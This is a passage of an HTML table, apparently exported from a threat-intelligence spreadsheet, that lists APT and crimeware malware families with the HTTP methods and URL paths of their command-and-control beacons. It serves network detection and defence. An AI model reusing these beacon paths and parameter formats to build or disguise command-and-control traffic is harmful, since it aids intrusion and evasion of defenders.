<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"OnionDuke"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">OnionDuke</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=\ns/sysinfo_7.php\n/forum/phpBB3/prx_26.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=<br />s/sysinfo_7.php<br />/forum/phpBB3/prx_26.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Lagulon (Operation Cleaver)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Lagulon (Operation Cleaver)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/contador/server.php\n/i/server.php\n/includes/server.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/contador/server.php<br />/i/server.php<br />/includes/server.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT?</span></td><td data-sheets-value="[null,2,"Medusa"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Medusa</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"%s/bbc_mirror/%s/search?id=%s\n/CNN_Mirror/EN/%s/search?id=%s\n|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|00|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">%s/bbc_mirror/%s/search?id=%s<br />/CNN_Mirror/EN/%s/search?id=%s<br />|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|00|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Toopu"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Toopu</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/toopu.png\n/%s:1048%s\n/num3.html\n/web/get_ad3.asp?type=loadall&machinename= <MACHINE_NAME>-6C78A9C3&cr=yes\n/num3_51la.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/toopu.png<br />/%s:1048%s<br />/num3.html<br />/web/get_ad3.asp?type=loadall&machinename= &lt;MACHINE_NAME&gt;-6C78A9C3&cr=yes<br />/num3_51la.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Twerkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Twerkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/classes/functions.php?functionname=online\n/classes/functions.php?functionname=getupdates\n/classes/functions.php?functionname=getcommand"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/classes/functions.php?functionname=online<br />/classes/functions.php?functionname=getupdates<br />/classes/functions.php?functionname=getcommand</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TzeeBot / TinyZBot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TzeeBot / TinyZBot</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/checkupdate.asmx"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/checkupdate.asmx</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"XLS URLDownload ToFileA function for Dridex"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">XLS URLDownload ToFileA function for Dridex</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/koh/mui.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/koh/mui.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Quervar / Induc.C / Dorifel"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Quervar / Induc.C / Dorifel</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/js/way.php?00021708&pin=7DF38AD66C78A9C3\n/404/way.php?00038F50&pin=7DF38AD66C78A9C3\n/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3\n/1.php?JXU9WXFG&pin=DEC09603F4CEFD80"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/js/way.php?00021708&pin=7DF38AD66C78A9C3<br />/404/way.php?00038F50&pin=7DF38AD66C78A9C3<br />/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3<br />/1.php?JXU9WXFG&pin=DEC09603F4CEFD80</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Feidowns downloader / Kilim (?) / Cracktools"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Feidowns downloader / Kilim (?) / Cracktools</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"yeniadmin.php?os=WindowsXP \n/yeniadmin.php?os=Windows7&osbit=64&antiv \n/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI\nhttp://whos.amung.us/pingjs/?k=yenikazi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">yeniadmin.php?os=WindowsXP <br />/yeniadmin.php?os=Windows7&osbit=64&antiv <br />/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI<br />http://whos.amung.us/pingjs/?k=yenikazi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameVance Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameVance Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/aj/updtah.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/aj/updtah.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"OpenShopper Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">OpenShopper Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"//mmsv/Access3.php\n//opendb/mmsv.php\n//mmsv/Access2.php\n/opapp/postmedia1/Update.dat\n/opapp/postmedia1/OKUpdate.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">//mmsv/Access3.php<br />//opendb/mmsv.php<br />//mmsv/Access2.php<br />/opapp/postmedia1/Update.dat<br />/opapp/postmedia1/OKUpdate.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"SoftPulse Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">SoftPulse Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"FakeAV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">FakeAV</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/[...]/load.php?file=uploader\n/[...]/load.php?file=grabbers\n/[\u2026]/load.php?file=1\n/ohwgx3kiTh/document.doc\n/ohwgx3kiTh/load.php?file=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/[...]/load.php?file=uploader<br />/[...]/load.php?file=grabbers<br />/[…]/load.php?file=1<br />/ohwgx3kiTh/document.doc<br />/ohwgx3kiTh/load.php?file=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Wauchos (download by Zbot of Cridex)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Wauchos (download by Zbot of Cridex)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/ssdc32716372/file.php\n/auto*.it/*/jeve.exe\n//dd*.ru/old.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ssdc32716372/file.php<br />/auto*.it/*/jeve.exe<br />//dd*.ru/old.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blackenergy DDos Bot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackenergy DDos Bot</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"id=[bot_id]&bid=[base64_encoded_build_\nid]&dv=[x]&mv=[y]&dpv=[z]\nid=[bot_id_sha1]&bid=[base64_encoded_build_\nid]&nm=[x]&cn=[y]&num=[z]\nThe only major difference is that the id field contain just\nthe hash instead of the actual string"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">id=[bot_id]&bid=[base64_encoded_build_<br />id]&dv=[x]&mv=[y]&dpv=[z]<br />id=[bot_id_sha1]&bid=[base64_encoded_build_<br />id]&nm=[x]&cn=[y]&num=[z]<br />The only major difference is that the id field contain just<br />the hash instead of the actual string</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Alurewo / Alureon pay per click"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Alurewo / Alureon pay per click</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"OSX Wirelurker"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">OSX Wirelurker</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"mac/getversion.php?sn=<SN>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">mac/getversion.php?sn=<sn></sn></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Systweak Adware - Systweak RegClean Pro & Advanced System Protector"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Systweak Adware - Systweak RegClean Pro & Advanced System Protector</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/getipaddress.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/getipaddress.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"MPlug / Multiplug Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">MPlug / Multiplug Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&\n page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7\n 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436\n 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E\n +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro\n w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%\n 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+\n -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. 
rar&project_encod\n e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_\n redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo\n ut_id= 8&project_name=TusFiles&uuid=%252A"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&<br /> page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7<br /> 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436<br /> 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E<br /> +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro<br /> w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%<br /> 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+<br /> -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod<br /> e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_<br /> redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo<br /> ut_id= 8&project_name=TusFiles&uuid=%252A</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nemucod JS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nemucod JS</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939\n 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939<br /> 1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Andromeda / Wauchos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Andromeda / Wauchos</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/and/gate.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/and/gate.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Poweliks click-fraud"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Poweliks click-fraud</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Poweliks click-fraud"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Poweliks click-fraud</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Yoddos / Darkshell / YoYoDDoS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Yoddos / Darkshell / YoYoDDoS</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cobra / Turla"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cobra / Turla</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/%s/%s?\nuid=%d&context=%s&mode=text&data=%s"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/%s/%s?<br />uid=%d&context=%s&mode=text&data=%s</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Panda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Panda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/forum/login.cgi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/forum/login.cgi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Panda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Panda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/Photos/Query.cgi?loginid="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Photos/Query.cgi?loginid=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Aided Frame"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Aided Frame</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/img/js.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/img/js.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Scanbox Watering hole framework"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Scanbox Watering hole framework</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/i/recv.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/i/recv.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blackenergy DDos Bot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackenergy DDos Bot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Syria Twitter. apk"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Syria Twitter. apk</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/contacts"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/contacts</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: bottom;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"TinyBaron / Miniduke / CosmicDuke"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TinyBaron / Miniduke / CosmicDuke</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /modules/db/mgr.php?\n /modules/db/mgr.php?F=3?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /modules/db/mgr.php?<br /> /modules/db/mgr.php?F=3?</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME?</span></td><td data-sheets-value="[null,2,"Moure"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Moure</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=\n /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k\n /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n\n /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr\n /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu\n /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=<br /> /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k<br /> /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n<br /> /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr<br /> /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu<br /> /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vundo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vundo</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /webhp\n /wpad.dat"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /webhp<br /> /wpad.dat</span></td></tr>
